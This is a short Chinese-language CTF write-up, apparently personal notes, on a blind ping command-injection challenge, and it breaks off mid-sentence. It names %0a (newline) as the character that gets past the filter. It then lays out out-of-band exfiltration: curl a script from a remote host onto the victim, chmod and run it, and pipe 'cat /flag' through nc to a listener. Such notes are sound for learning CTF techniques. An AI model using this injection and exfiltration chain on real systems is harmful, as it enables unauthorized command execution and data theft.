参考:https://blog.csdn.net/m0_50317371/article/details/110489711
这个题有两个问题:
第一个就是没有回显,输入能够ping的ip无回显;输入特殊字符,提示含有危险字符;不输入,提示为空;这就导致即使执行成功的命令,比如:cat /flag,也不能看到flag
第二个问题就是过滤了很多字符,这个可用特殊字符字典抓包爆破,能够快速查找到没过滤的字符,%0a(换行符)
第一个问题方法:
- 需要一个可远程访问的网站,在网站上放一个文件,内容为 ls | cat /flag |nc 网站ip 8089; ls的查询内容为cat 的输入内容
- 在受害机上curl 这个文件到指定目录
- 增加文件权限,chmod
- 在网站的ip下设置监听
- 执行文件,sh file,受害机在执行文件后就会连接到网站ip
这样,cat的内容才能在网站主机上显示出来
因为我不是在本机上搭的这题的环境,我也没有